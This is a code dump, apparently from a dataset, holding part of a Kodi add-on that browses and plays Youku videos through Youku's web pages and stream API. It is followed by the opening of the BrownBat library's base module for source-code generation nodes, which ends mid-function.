    \', re.DOTALL).findall(link)\n totalItems = len(match) + 1 + len(plist)\n currpage = int(page)\n\n genrelist,arealist,yearlist = getList(listpage,id,genre,area,year)\n if genre:\n genrestr = searchDict(genrelist,genre)\n else:\n genrestr = \'全部类型\'\n if area:\n areastr = searchDict(arealist,area)\n else:\n\t\t areastr = \'全部地区\'\n if year:\n yearstr = searchDict(yearlist,year)\n else:\n if id == \'c_84\' or id == \'c_87\':\n yearstr = \'全部出品\'\n else:\n yearstr = \'全部年份\'\n li = xbmcgui.ListItem(name+\'(第\'+str(currpage)+\'/\'+str(totalpages)+\'页)【[COLOR FFFF0000]\' + genrestr + \'[/COLOR]/[COLOR FF00FF00]\' + areastr + \'[/COLOR]/[COLOR FFFFFF00]\' + yearstr + \'[/COLOR]/[COLOR FF00FF00]\' + searchDict(DAYS_LIST1,days) + \'[/COLOR]/[COLOR FF00FFFF]\' + searchDict(ORDER_LIST1,order) + \'[/COLOR]】(按此选择)\')\n u = sys.argv[0]+""?mode=4&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&area=""+urllib.quote_plus(area)+""&year=""+urllib.quote_plus(year)+""&order=""+order+""&days=""+days+""&page=""+urllib.quote_plus(listpage)\n xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)\n for i in range(0,len(match)):\n if id in (\'c_96\',\'c_95\'):\n mode = 2\n isdir = False\n else:\n mode = 3\n isdir = True\n match1 = re.compile(\'/id_(.+?).html""\').search(match[i]) \n p_id = match1.group(1)\n match1 = re.compile(\'(.+?)\').search(match[i])\n p_name = match1.group(1)\n match1 = re.compile(\'
  • (.+?)\').search(match[i])\n if match1:\n p_name1 = p_name + \'(\' + match1.group(1) + \')\'\n else:\n p_name1 = p_name\n match1 = re.compile(\'(.+?)\').search(match[i])\n if match1:\n p_name1 = p_name1 + \'[\' + match1.group(1) + \']\'\n li = xbmcgui.ListItem(str(i + 1) + \'. \' + p_name1, iconImage = \'\', thumbnailImage = p_thumb)\n u = sys.argv[0]+""?mode=""+str(mode)+""&name=""+urllib.quote_plus(p_name)+""&id=""+urllib.quote_plus(p_id)+""&thumb=""+urllib.quote_plus(p_thumb)\n #li.setInfo(type = ""Video"", infoLabels = {""Title"":p_name, ""Director"":p_director, ""Genre"":p_genre, ""Plot"":p_plot, ""Year"":p_year, ""Cast"":p_cast, ""Tagline"":p_tagline})\n xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, isdir, totalItems)\n \n for num in plist:\n li = xbmcgui.ListItem(""... 第"" + num + ""页"")\n u = sys.argv[0]+""?mode=1&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&area=""+urllib.quote_plus(area)+""&year=""+year+""&order=""+order+""&days=""+days+""&page=""+str(num)\n xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems) \n xbmcplugin.setContent(int(sys.argv[1]), \'movies\')\n xbmcplugin.endOfDirectory(int(sys.argv[1]))\n\ndef getMovie(name,id,thumb):\n if len(id)==21:\n link = GetHttpData(\'http://www.youku.com/show_page/id_\' + id + \'.html\')\n match = re.compile(\'.*?href=""http://v.youku.com/v_show/id_(.+?)\\.html[^""]*""\', re.DOTALL).search(link)\n if match:\n # 播放正片\n PlayVideo(name, match.group(1), thumb)\n else:\n # 解析预告片\n match = re.compile(\'class=""btnShow btnplaytrailer"".*?href=""http://v.youku.com/v_show/id_(.+?)\\.html[^""]*""\', re.DOTALL).search(link)\n if match:\n PlayVideo(name, match.group(1), thumb)\n else:\n xbmcgui.Dialog().ok(__addonname__, \'解析地址异常,可能是收费节目,无法播放\')\n else:\n PlayVideo(name, id, thumb)\n\ndef seriesList(name,id,thumb):\n url = ""http://v.youku.com/v_show/id_%s.html"" % (id)\n data = GetHttpData(url)\n #pages = re.compile(\'
  • 1:\n # for i in range(1,len(pages)):\n # url = ""http://www.youku.com/show_point/id_%s.html?dt=json&divid=%s&tab=0&__rt=1&__ro=%s"" % (id, pages[i], pages[i])\n # link = GetHttpData(url)\n # data += link\n match = re.compile(\'class=""item(.+?)
  • \', re.DOTALL).findall(data)\n totalItems = len(match)\n\n for i in range(0,len(match)):\n match1 = re.compile(\'//v.youku.com/v_show/id_(.+?)\\.html\').search(match[i])\n if match1:\n p_id = match1.group(1)\n else:\n continue\n #match1 = re.compile(\'
    (.+?)\', re.DOTALL).search(link)\n plist = []\n if match:\n match1 = re.compile(\'([0-9]+)(|)\', re.DOTALL).findall(match.group(1))\n if match1:\n for num, temp in match1:\n if (num not in plist) and (num != page):\n plist.append(num)\n totalpages = int(match1[len(match1)-1][0])\n else:\n totalpages = 1\n match = re.compile(\'
    (.+?)
    \', re.DOTALL).search(link)\n if match:\n listpage = match.group(1)\n else:\n listpage = \'\'\n match = re.compile(\'
    \', re.DOTALL).findall(link)\n\n totalItems = len(match) + 1 + len(plist)\n currpage = int(page)\n\n genrelist = getList2(listpage, genre)\n if genre == \'0\':\n genrestr = \'全部类型\'\n else:\n genrestr = searchDict(genrelist,genre)\n li = xbmcgui.ListItem(name+\'(第\'+str(currpage)+\'/\'+str(totalpages)+\'页)【[COLOR FFFF0000]\' + genrestr + \'[/COLOR]/[COLOR FF00FF00]\' + searchDict(DAYS_LIST2,days) + \'[/COLOR]/[COLOR FF00FFFF]\' + searchDict(ORDER_LIST2,order) + \'[/COLOR]】(按此选择)\')\n u = sys.argv[0]+""?mode=12&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&order=""+order+""&days=""+days+""&page=""+urllib.quote_plus(listpage)\n xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems)\n for i in range(0,len(match)):\n match1 = re.compile(\'/id_(.+?).html""\').search(match[i])\n p_id = match1.group(1)\n match1 = re.compile(\'(.+?)\').search(match[i])\n p_name = match1.group(1)\n p_name1 = p_name\n li = xbmcgui.ListItem(str(i + 1) + \'. \' + p_name1, iconImage = \'\', thumbnailImage = p_thumb)\n u = sys.argv[0]+""?mode=10&name=""+urllib.quote_plus(p_name)+""&id=""+urllib.quote_plus(p_id)+""&thumb=""+urllib.quote_plus(p_thumb)\n #li.setInfo(type = ""Video"", infoLabels = {""Title"":p_name, ""Director"":p_director, ""Genre"":p_genre, ""Plot"":p_plot, ""Year"":p_year, ""Cast"":p_cast, ""Tagline"":p_tagline})\n xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, False, totalItems)\n\n for num in plist:\n li = xbmcgui.ListItem(""... 第"" + num + ""页"")\n u = sys.argv[0]+""?mode=11&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&order=""+order+""&days=""+days+""&page=""+str(num)\n xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems) \n xbmcplugin.setContent(int(sys.argv[1]), \'movies\')\n xbmcplugin.endOfDirectory(int(sys.argv[1]))\n\ndef selResolution(streamtypes):\n ratelist = []\n for i in range(0,len(streamtypes)):\n if streamtypes[i] in (\'flv\', \'flvhd\'): ratelist.append([4, \'标清\', i, \'flv\']) # [清晰度设置值, 清晰度, streamtypes索引]\n if streamtypes[i] in (\'mp4\', \'mp4hd\'): ratelist.append([3, \'高清\', i, \'mp4\'])\n if streamtypes[i] in (\'hd2\', \'hd2v2\', \'mp4hd2\', \'mp4hd2v2\'): ratelist.append([2, \'超清\', i, \'hd2\'])\n if streamtypes[i] in (\'hd3\', \'hd3v2\', \'mp4hd3\', \'mp4hd3v2\'): ratelist.append([1, \'1080P\', i, \'hd3\'])\n ratelist.sort()\n if len(ratelist) > 1:\n resolution = int(__addon__.getSetting(\'resolution\'))\n if resolution == 0: # 每次询问视频清晰度\n list = [x[1] for x in ratelist]\n sel = xbmcgui.Dialog().select(\'清晰度(低网速请选择低清晰度)\', list)\n if sel == -1:\n return None, None, None, None\n else:\n sel = 0\n while sel < len(ratelist)-1 and resolution > ratelist[sel][0]: sel += 1\n else:\n sel = 0\n return streamtypes[ratelist[sel][2]], ratelist[sel][1], ratelist[sel][2], ratelist[sel][3]\n\ndef youku_ups(id):\n res = urllib2.urlopen(\'https://log.mmstat.com/eg.js\')\n cna = res.headers[\'etag\'][1:-1]\n query = urllib.urlencode(dict(\n vid = id,\n ccode = \'0516\',\n client_ip = \'127.0.0.1\',\n utid = cna,\n client_ts = time.time() / 1000,\n ckey = \'PI:KEY\'\n ))\n url = \'https://ups.youku.com/ups/get.json?%s\' % (query)\n link = GetHttpData(url, referer=\'http://v.youku.com/\')\n json_response = simplejson.loads(link)\n api_data = json_response[\'data\']\n data_error = api_data.get(\'error\')\n if data_error:\n api_error_code = data_error.get(\'code\')\n api_error_msg = data_error.get(\'note\').encode(\'utf-8\')\n dialog = 
xbmcgui.Dialog()\n ok = dialog.ok(__addonname__,\'地址解析错误(%d):\\n%s\' % (api_error_code,api_error_msg))\n return {}\n else:\n return api_data\n\ndef change_cdn(url):\n # if the cnd_url starts with an ip addr, it should be youku\'s old CDN\n # which rejects http requests randomly with status code > 400\n # change it to the dispatcher of aliCDN can do better\n # at least a little more recoverable from HTTP 403\n dispatcher_url = \'vali.cp31.ott.cibntv.net\'\n if dispatcher_url in url:\n return url\n elif \'k.youku.com\' in url:\n return url\n else:\n url_seg_list = list(urlparse.urlsplit(url))\n url_seg_list[1] = dispatcher_url\n return urlparse.urlunsplit(url_seg_list)\n\ndef PlayVideo(name,id,thumb):\n movdat = youku_ups(id)\n if not movdat:\n return\n\n vid = id\n lang_select = int(__addon__.getSetting(\'lang_select\')) # 默认|每次选择|自动首选\n if lang_select != 0 and movdat.has_key(\'dvd\') and \'audiolang\' in movdat[\'dvd\']:\n langlist = movdat[\'dvd\'][\'audiolang\']\n if lang_select == 1:\n list = [x[\'lang\'] for x in langlist]\n sel = xbmcgui.Dialog().select(\'选择语言\', list)\n if sel ==-1:\n return\n vid = langlist[sel][\'vid\'].encode(\'utf-8\')\n name = \'%s %s\' % (name, langlist[sel][\'lang\'].encode(\'utf-8\'))\n else:\n lang_prefer = __addon__.getSetting(\'lang_prefer\') # 国语|粤语\n for i in range(0,len(langlist)):\n if langlist[i][\'lang\'].encode(\'utf-8\') == lang_prefer:\n vid = langlist[i][\'vid\'].encode(\'utf-8\')\n name = \'%s %s\' % (name, langlist[i][\'lang\'].encode(\'utf-8\'))\n break\n if vid != id:\n movdat = youku_ups(vid)\n if not movdat:\n return\n\n streamtypes = [stream[\'stream_type\'].encode(\'utf-8\') for stream in movdat[\'stream\']]\n typeid, typename, streamno, resolution = selResolution(streamtypes)\n if typeid:\n \'\'\'\n oip = movdat[\'security\'][\'ip\']\n ep = movdat[\'security\'][\'encrypt_string\']\n sid, token = youkuDecoder().get_sid(ep)\n play_method = int(__addon__.getSetting(\'play_method\'))\n if play_method != 0: # m3u8方式\n query = urllib.urlencode(dict(\n vid=vid, ts=int(time.time()), keyframe=1, type=resolution,\n ep=ep, oip=oip, ctype=12, ev=1, token=token, sid=sid,\n ))\n cookie = [\'%s=%s\' % (x.name, x.value) for x in cj][0]\n movurl = \'http://pl.youku.com/playlist/m3u8?%s|Cookie=%s\' % (query, cookie)\n\n else: # 默认播放方式\n if typeid in (\'mp4\', \'mp4hd\'):\n type = \'mp4\'\n else:\n type = \'flv\'\n urls = []\n segs = movdat[\'stream\'][streamno][\'segs\']\n total = len(segs)\n for no in range(0, total):\n k = segs[no][\'key\']\n if k == -1:\n dialog = xbmcgui.Dialog()\n ok = dialog.ok(__addonname__,\'会员节目,无法播放\')\n return\n fileid = segs[no][\'fileid\']\n ep = youkuDecoder().generate_ep(no, fileid, sid, token)\n query = urllib.urlencode(dict(\n ctype = 12,\n ev = 1,\n K = k,\n ep = urllib.unquote(ep),\n oip = oip,\n token = token,\n yxon = 1\n ))\n url = \'http://k.youku.com/player/getFlvPath/sid/{sid}_00/st/{container}/fileid/{fileid}?{query}\'.format(\n sid = sid,\n container = type,\n fileid = fileid,\n query = query\n )\n link = GetHttpData(url)\n json_response = simplejson.loads(link)\n urls.append(json_response[0][\'server\'].encode(\'utf-8\'))\n movurl = \'stack://\' + \' , \'.join(urls)\n \'\'\'\n movurl = movdat[\'stream\'][streamno][\'m3u8_url\']\n #urls = []\n #is_preview = False\n #for seg in movdat[\'stream\'][streamno][\'segs\']:\n # if seg.get(\'cdn_url\'):\n # urls.append(change_cdn(seg[\'cdn_url\'].encode(\'utf-8\')))\n # else:\n # is_preview = True\n #if not is_preview:\n # movurl = \'stack://\' + \' , \'.join(urls)\n 
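# (change_cdn() above swaps the URL's netloc for the aliCDN dispatcher via
#  urlparse.urlsplit/urlunsplit unless the URL already points at it or at
#  k.youku.com; illustrative only, the input host is made up:
#      change_cdn('http://1.2.3.4/seg.ts')
#      -> 'http://vali.cp31.ott.cibntv.net/seg.ts'
#  )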
name = \'%s[%s]\' % (name, typename)\n listitem=xbmcgui.ListItem(name,thumbnailImage=thumb)\n listitem.setInfo(type=""Video"",infoLabels={""Title"":name})\n xbmc.Player().play(movurl, listitem)\n\ndef performChanges(name,id,listpage,genre,area,year,order,days):\n genrelist,arealist,yearlist = getList(listpage,id,genre,area,year)\n change = False\n if id == \'c_95\':\n str1 = \'风格\'\n str3 = \'发行\'\n elif id == \'c_84\' or id == \'c_87\':\n str1 = \'类型\'\n str3 = \'出品\'\n else:\n str1 = \'类型\'\n str3 = \'时间\'\n dialog = xbmcgui.Dialog()\n if len(genrelist)>0:\n list = [x[1] for x in genrelist]\n sel = dialog.select(str1, list)\n if sel != -1:\n genre = genrelist[sel][0]\n change = True\n if len(arealist)>0:\n list = [x[1] for x in arealist]\n sel = dialog.select(\'地区\', list)\n if sel != -1:\n area = arealist[sel][0]\n change = True\n if len(yearlist)>0:\n list = [x[1] for x in yearlist]\n sel = dialog.select(str3, list)\n if sel != -1:\n year = yearlist[sel][0]\n change = True\n list = [x[1] for x in DAYS_LIST1]\n sel = dialog.select(\'范围\', list)\n if sel != -1:\n days = DAYS_LIST1[sel][0]\n change = True\n list = [x[1] for x in ORDER_LIST1]\n sel = dialog.select(\'排序\', list)\n if sel != -1:\n order = ORDER_LIST1[sel][0]\n change = True\n\n if change:\n progList(name,id,\'1\',genre,area,year,order,days)\n\ndef performChanges2(name,id,listpage,genre,order,days):\n genrelist = getList2(listpage, genre)\n change = False\n dialog = xbmcgui.Dialog()\n if len(genrelist)>0:\n list = [x[1] for x in genrelist]\n sel = dialog.select(\'类型\', list)\n if sel != -1:\n genre = genrelist[sel][0]\n change = True\n list = [x[1] for x in DAYS_LIST2]\n sel = dialog.select(\'范围\', list)\n if sel != -1:\n days = DAYS_LIST2[sel][0]\n change = True\n list = [x[1] for x in ORDER_LIST2]\n sel = dialog.select(\'排序\', list)\n if sel != -1:\n order = ORDER_LIST2[sel][0]\n change = True\n\n if change:\n progList2(name,id,\'1\',genre,order,days)\n\ndef get_params():\n param = []\n paramstring = sys.argv[2]\n if len(paramstring) >= 2:\n params = sys.argv[2]\n cleanedparams = params.replace(\'?\', \'\')\n if (params[len(params) - 1] == \'/\'):\n params = params[0:len(params) - 2]\n pairsofparams = cleanedparams.split(\'&\')\n param = {}\n for i in range(len(pairsofparams)):\n splitparams = {}\n splitparams = pairsofparams[i].split(\'=\')\n if (len(splitparams)) == 2:\n param[splitparams[0]] = splitparams[1]\n return param\n\nparams = get_params()\nmode = None\nname = \'\'\nid = \'\'\ngenre = \'\'\narea = \'\'\nyear = \'\'\norder = \'\'\npage = \'1\'\nurl = None\nthumb = None\n\ntry:\n thumb = urllib.unquote_plus(params[""thumb""])\nexcept:\n pass\ntry:\n url = urllib.unquote_plus(params[""url""])\nexcept:\n pass\ntry:\n page = urllib.unquote_plus(params[""page""])\nexcept:\n pass\ntry:\n order = urllib.unquote_plus(params[""order""])\nexcept:\n pass\ntry:\n days = urllib.unquote_plus(params[""days""])\nexcept:\n pass\ntry:\n year = urllib.unquote_plus(params[""year""])\nexcept:\n pass\ntry:\n area = urllib.unquote_plus(params[""area""])\nexcept:\n pass\ntry:\n genre = urllib.unquote_plus(params[""genre""])\nexcept:\n pass\ntry:\n id = urllib.unquote_plus(params[""id""])\nexcept:\n pass\ntry:\n name = urllib.unquote_plus(params[""name""])\nexcept:\n pass\ntry:\n mode = int(params[""mode""])\nexcept:\n pass\n\ncj = cookielib.CookieJar()\nopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))\nurllib2.install_opener(opener)\n\nif mode == None:\n rootList()\nelif mode == 1:\n 
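# (Dispatch map for the plugin entry point: no mode -> rootList(); 1/4 ->
#  category listing and its filter dialog; 2 -> getMovie() resolution of a
#  show page; 3 -> seriesList() episodes; 10 -> PlayVideo(); 11/12 -> the
#  progList2() listing and its filter dialog.)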
progList(name, id, page, genre, area, year, order, days)\nelif mode == 2:\n    getMovie(name, id, thumb)\nelif mode == 3:\n    seriesList(name, id, thumb)\nelif mode == 4:\n    performChanges(name, id, page, genre, area, year, order, days)\nelif mode == 10:\n    PlayVideo(name, id, thumb)\nelif mode == 11:\n    progList2(name, id, page, genre, order, days)\nelif mode == 12:\n    performChanges2(name, id, page, genre, order, days)\n\n\', \'\n# Copyright 2014 Douglas RAILLARD\n#\n# This file is part of BrownBat.\n#\n# BrownBat is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# BrownBat is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with BrownBat. If not, see .\n\n""""""\n.. moduleauthor:: Douglas RAILLARD dummy@email.com\n\nThis module mostly provides base classes intended to be subclassed for building\nlanguage-specific source code generation libraries.\n\nThey implement functionalities related to operator overloading that can be used in any language.\nEvery class representing a source code construct is known as a node.\nThe following helper functions are provided:\n\n* :func:`listify`: create a list from an iterable or a single element.\n* :func:`format_string`: format a string according to the given convention (camel case, upper case, etc.).\n* :func:`strip_starting_blank_lines`: strip the blank lines at the beginning of a multiline string.\n\nThe following classes are provided:\n\n* :class:`Indentation`: manage the indentation level in the code generator.\n* :class:`NonIterable`: inheriting from this class allows a class which would otherwise be considered iterable to be treated as non-iterable by :func:`listify`.\n* :class:`NodeMeta`: metaclass of all classes representing source code constructs.\n* :class:`NodeABC`: abstract base class of all classes representing source code constructs.\n* :class:`NodeBase`: base class of almost all classes representing source code constructs.\n* :class:`NodeAttrProxy`: proxy class that forwards the calls to the :class:`NodeABC` API to an attribute which is itself a :class:`NodeABC`. It implements composition.\n* :class:`EnsureNode`: descriptor used to build attributes that guarantee that they contain an instance of NodeABC.\n* :class:`DelegatedAttribute`: descriptor used to delegate an attribute to another instance which has the given attribute name.\n* :class:`NodeViewBase`: base class for classes representing a view of another node (for example a variable declaration is a view of the variable).\n* :class:`PhantomNode`: class which can be used as an empty placeholder when a node is required.\n* :class:`NodeContainerBase`: base class for node containers. It mostly implements operator overloading.\n* :class:`TokenListABC`: abstract base class for token lists. 
This is a node that can contain a list of any object that can be used as a string, and concatenates them when printed.\n* :class:`DelegatedTokenListBase`: base class for a token list that uses a specific attribute to really hold the token list instance (thus implementing composition instead of inheritance).\n* :class:`TokenListBase`: base class for a token list.\n* :class:`IndentedTokenListBase`: base class for a token list which indents its content when printed.\n* :class:`IndentedDelegatedTokenListBase`: mix of :class:`IndentedTokenListBase` and :class:`DelegatedTokenListBase`.\n* :class:`BacktraceBase`: base class for a special token list that outputs a simplified backtrace of the Python code that was used to build the instance. Useful when trying to debug the code generator.\n\n""""""\n\n\nimport collections\nimport numbers\nimport abc\nimport inspect\nimport copy\nimport functools\nimport os\n\n\ndef listify(iterable_or_single_elem):\n    """"""Create a list out of:\n\n    * an iterable object: the result will be like ``list(iterable_or_single_elem)``\n    * an object which cannot be iterated over: return a list with only one item (just the object)\n    * an object which is iterable, but also a subclass of :class:`NonIterable`:\n      return a list with just the object, as if it was not iterable.\n    """"""\n    if iterable_or_single_elem is None:\n        return []\n    # We exclude iterables such as strings or NonIterable (StmtContainer for example)\n    # because we want to keep them as one object and not split them\n    if isinstance(iterable_or_single_elem, collections.Iterable) \\\n        and not isinstance(iterable_or_single_elem, (str, NonIterable)):\n        return list(iterable_or_single_elem)\n    else:\n        return [iterable_or_single_elem]\n\ndef format_string(string, style, separator=""_""):\n    """""" Format a string according to a convention.\n\n    It can be used to write identifier names in a unified format before applying a naming convention.\n\n    :param string: the string to be modified. It must be in a format where the word separator is always the same.\n    :param style: the convention. 
It can be one of:\n\n        * UpperCamelCase\n        * lowerCamelCase\n        * lower_underscore_case\n        * UPPER_UNDERSCORE_CASE\n    :param separator: the word separator used to split the words apart before applying the convention.\n        It defaults to \'_\'.\n    """"""\n    if isinstance(string, collections.Iterable) and not isinstance(string, (str, NonIterable)):\n        token_list = string\n    else:\n        token_list = str(string).split(separator)\n    # If there is only one token in the list and in case it is an empty\n    # string, we don\'t want to replace it with a _\n    if len(token_list) != 1:\n        for i, token in enumerate(token_list):\n            if not token:\n                token_list[i] = separator\n\n    if style == ""UpperCamelCase"":\n        return """".join(token.capitalize() for token in token_list)\n\n    if style == ""lowerCamelCase"":\n        first_word = token_list[0].lower()\n        remain_list = token_list[1:]\n        return first_word+"""".join(token.capitalize() for token in remain_list)\n\n    if style == ""lower_underscore_case"":\n        return ""_"".join(token.lower() for token in token_list)\n\n    if style == ""UPPER_UNDERSCORE_CASE"":\n        return ""_"".join(token.upper() for token in token_list)\n\ndef strip_starting_blank_lines(snippet):\n    """"""Strip blank lines at the beginning of a multiline string.""""""\n\n    last_new_line_pos = 0\n    for position, char in enumerate(snippet):\n        if char == \'\\n\':\n            last_new_line_pos = position\n        elif char != \'\\t\' and char != \' \' and char != \'\\v\':\n            break\n    # Only keep one new line at the beginning, to avoid multiple blank lines\n    return snippet[last_new_line_pos:]\n\nclass Indentation:\n    """"""This class manages the indentation in the source code output.\n\n    Instances can be printed to give the string to put at the beginning of a new indented line.\n\n    >>> idt = Indentation()\n    >>> idt.indent()\n    >>> print(\'*\'+str(idt)+\'indented Hello World\')\n    *    indented Hello World\n    """"""\n\n    # Default indentation style (4 spaces)\n    indentation_string = \'    \'\n\n    @classmethod\n    def ensure_idt(cls, idt):\n        """"""Create a new indentation instance if *idt* is None,\n        or return *idt* if it is already an :class:`Indentation` instance.\n        """"""\n        if idt is None:\n            idt = cls()\n        elif isinstance(idt, numbers.Integral):\n            idt = cls(idt)\n        elif isinstance(idt, str):\n            idt = cls(indentator=idt)\n        return idt\n\n\n    def __init__(self, level=0, indentator=None):\n        """"""\n        :param level: the initial indentation level\n        :type level: int\n        :param indentator: the string used to display indentation.\n            It defaults to the class attribute *indentation_string* which is four spaces.\n        """"""\n        self.indentation_level = level\n        # If an indentation string is given, override the class-wide default with\n        # an instance-local string\n        if indentator is not None:\n            self.indentation_string = indentator\n\n    def indent(self, level=1):\n        """"""Increase the indentation level by *level* levels.""""""\n        self.indentation_level += level\n\n    def dedent(self, level=1):\n        """"""Decrease the indentation level by *level* levels.""""""\n        self.indentation_level -= level\n\n    def __str__(self):\n        """"""Return the string to be used at the beginning of a line to display the indentation.""""""\n        return self.indentation_string * self.indentation_level\n\n\nclass NonIterable:\n    """""" Inheriting from this class will prevent a class from being considered as\n    :class:`collections.Iterable` by :func:`listify`.\n    """"""\n    pass\n\nclass NodeMeta(abc.ABCMeta):\n    """"""Meta class used for every node, i.e. 
every class representing source code constructs.\n\n    Currently, it only does a bit of black magic on the :meth:`NodeABC.inline_str` and :meth:`NodeABC.self_inline_str` methods:\n    it creates a wrapper around them that calls *inline_str_filter*, if it exists, on their return string, to\n    let the user apply some naming convention at the latest stage.\n    """"""\n    def __new__(meta, name, bases, dct):\n        # Add automatic \'inheritance\' for the __format_string class attribute\n        attr_name = \'_\'+name+\'__format_string\'\n        if bases and attr_name not in dct:\n            try:\n                dct[attr_name] = bases[0].__dict__[\'_\'+bases[0].__name__+\'__format_string\']\n            except KeyError:\n                pass\n\n        # Wrap the inline_str functions to allow automatic filtering on their output\n        def make_wrapper(wrapped_fun):\n            @functools.wraps(wrapped_fun)\n            def wrapper_fun(self, *args, **kwargs):\n                result = wrapped_fun(self, *args, **kwargs)\n                try:\n                    filter_fun = self.inline_str_filter\n                except AttributeError:\n                    # Just return the string as is, no filter hook is installed\n                    return result\n                else:\n                    # Call the filter on the resulting string\n                    return filter_fun(result)\n\n            return wrapper_fun\n\n        for stringify_fun_name in [\'inline_str\', \'self_inline_str\']:\n            if stringify_fun_name in dct:\n                wrapped_fun = dct[stringify_fun_name]\n                dct[stringify_fun_name] = make_wrapper(wrapped_fun)\n\n        return super().__new__(meta, name, bases, dct)\n\nclass NodeABC(metaclass=NodeMeta):\n    """"""This class is an Abstract Base Class describing the most basic API every node should conform to.""""""\n    __format_string = \'\'\n\n    @abc.abstractmethod\n    def inline_str(self, idt=None):\n        """"""This function is called to print the content of the node in an inline context.\n\n        This can be for example when the node is printed inside an expression.\n        This function should not try to print a preceding new line or indentation string.\n        """"""\n        pass\n\n    @abc.abstractmethod\n    def freestanding_str(self, idt=None):\n        """"""This function is called to print the content of the node in a freestanding context.\n\n        This can be for example when the node is printed directly in the source file.\n        This function should print the preceding new line and indentation if the source code construct\n        requires it.\n        """"""\n        pass\n\n    @abc.abstractmethod\n    def adopt_node(self, child):\n        pass\n\nclass NodeAttrProxy(NodeABC):\n    """"""This class is a proxy that redirects calls to the :class:`NodeABC` API to a given\n    attribute of a given instance.\n\n    It creates stubs that allow transparent composition for the most limited subset of the APIs\n    provided by this library, to avoid getting into crazy things.\n    This class should only be used when it enables factoring out lots of code. 
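A minimal sketch of the intent (hypothetical names, for illustration only):\n\n    >>> class Wrapper:\n    ...     def __init__(self, inner_node):\n    ...         self.inner = inner_node\n    ...         self.node_api = NodeAttrProxy(self, \'inner\')\n\n    Any :class:`NodeABC` call made on *node_api* is then forwarded to *inner*.\n    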
A design based on\n    hooks implemented in subclasses and called by a base class is preferable in most cases where you\n    would be tempted to use this proxy.\n    """"""\n    def __init__(self, obj, attr_name):\n        self.obj = obj\n        self.attr_name = attr_name\n\n    def inline_str(self, idt=None):\n        return getattr(self.obj, self.attr_name).inline_str(idt)\n\n    def freestanding_str(self, idt=None):\n        return getattr(self.obj, self.attr_name).freestanding_str(idt)\n\n    def adopt_node(self, child):\n        return getattr(self.obj, self.attr_name).adopt_node(child)\n\nclass EnsureNode:\n    """"""This class is a descriptor that makes sure that the attribute that uses it holds a reference\n    to an instance of one of the classes given in *node_classinfo*.\n\n    When set, this descriptor checks whether the given object is indeed an instance of one of the *node_classinfo* classes.\n    If not, it calls *node_factory* to build an object and stores its return value. Therefore,\n    the content of the attribute using this descriptor is always some instance of the classes\n    contained in *node_classinfo*. This descriptor is used as a gatekeeper to be able to make some assumptions\n    on the type of data held by the attribute.\n\n    .. note:: The *node_classinfo* always contains the class :class:`NodeABC`.\n    """"""\n    def __init__(self, storage_attr_name, node_factory, node_classinfo=()):\n        """"""\n        :param storage_attr_name: the underlying attribute used to store the object.\n        :param node_factory: the factory called when someone tries to store a non :class:`NodeABC` inside the attribute.\n        :param node_classinfo: this is a tuple that contains classes.\n            The value stored in the attribute is checked against this tuple using :func:`isinstance` to\n            determine if the factory should be used. This always contains at least :class:`NodeABC`.\n        """"""\n        self.storage_attr_name = storage_attr_name\n        self.node_factory = node_factory\n\n        node_classinfo = listify(node_classinfo)+[NodeABC]\n        if inspect.isclass(self.node_factory):\n            node_classinfo.append(self.node_factory)\n        node_classinfo = tuple(node_classinfo)\n\n        self.node_classinfo = node_classinfo\n\n    def __get__(self, instance, owner):\n        if instance is not None:\n            return instance.__dict__[self.storage_attr_name]\n        # If the descriptor is called as a class attribute, it\n        # just returns itself, to allow the world to see that it\n        # is a descriptor\n        else:\n            return self\n\n    def __set__(self, instance, value):\n        if not isinstance(value, self.node_classinfo):\n            value = self.node_factory(value)\n        instance.__dict__[self.storage_attr_name] = value\n\nclass NodeBase(NodeABC):\n    """"""This class is the base class of most nodes.\n\n    It provides some default implementations for methods of :class:`NodeABC`.\n    """"""\n    @classmethod\n    def ensure_node(cls, obj, factory=None):\n        """"""Ensure that the given object *obj* is an instance of the class this method is called from or of :class:`NodeABC`,\n        and if not, try to build a node from it using the class this class method is called from or *factory*.\n\n        .. note:: You should rather use the :class:`EnsureNode` descriptor when possible, instead of\n            this class method.\n\n        .. warning:: Not every class supports being called with only one parameter, so a call to this\n            class method is not guaranteed to succeed.\n\n        :param obj: the object to build a node from.\n        :param factory: an optional factory used to build the node from *obj*. 
If not provided, the class this\n            method is called from is called with *obj* as its first and only parameter.\n        """"""\n        if isinstance(obj, (cls, NodeABC)):\n            return obj\n        else:\n            if factory is not None:\n                return factory(obj)\n            else:\n                return cls(obj)\n\n    def __init__(self, comment=None, side_comment=None, parent=None):\n        """""" All of the parameters should be passed as keyword arguments, because they are forwarded from\n        the children classes and the order of arrival is not guaranteed.\n\n        :param comment: a comment node that will be printed next to the current node when the source code of\n            the node is generated. Usually, it is a block comment printed before the node\n            in languages that support them. This comment is printed by the containers such as\n            :class:`NodeContainerBase`, so it does not require any support from the class.\n\n        :param side_comment: a comment that will be printed just by the current node when the source code of\n            the node is generated. Usually, it is a one line comment, printed to the right of the\n            node. Be aware that this parameter is used by the class in whatever way it wants to,\n            and there is no guarantee it will be printed at all.\n        """"""\n\n        # Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes\n        self.comment = comment\n        # Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes\n        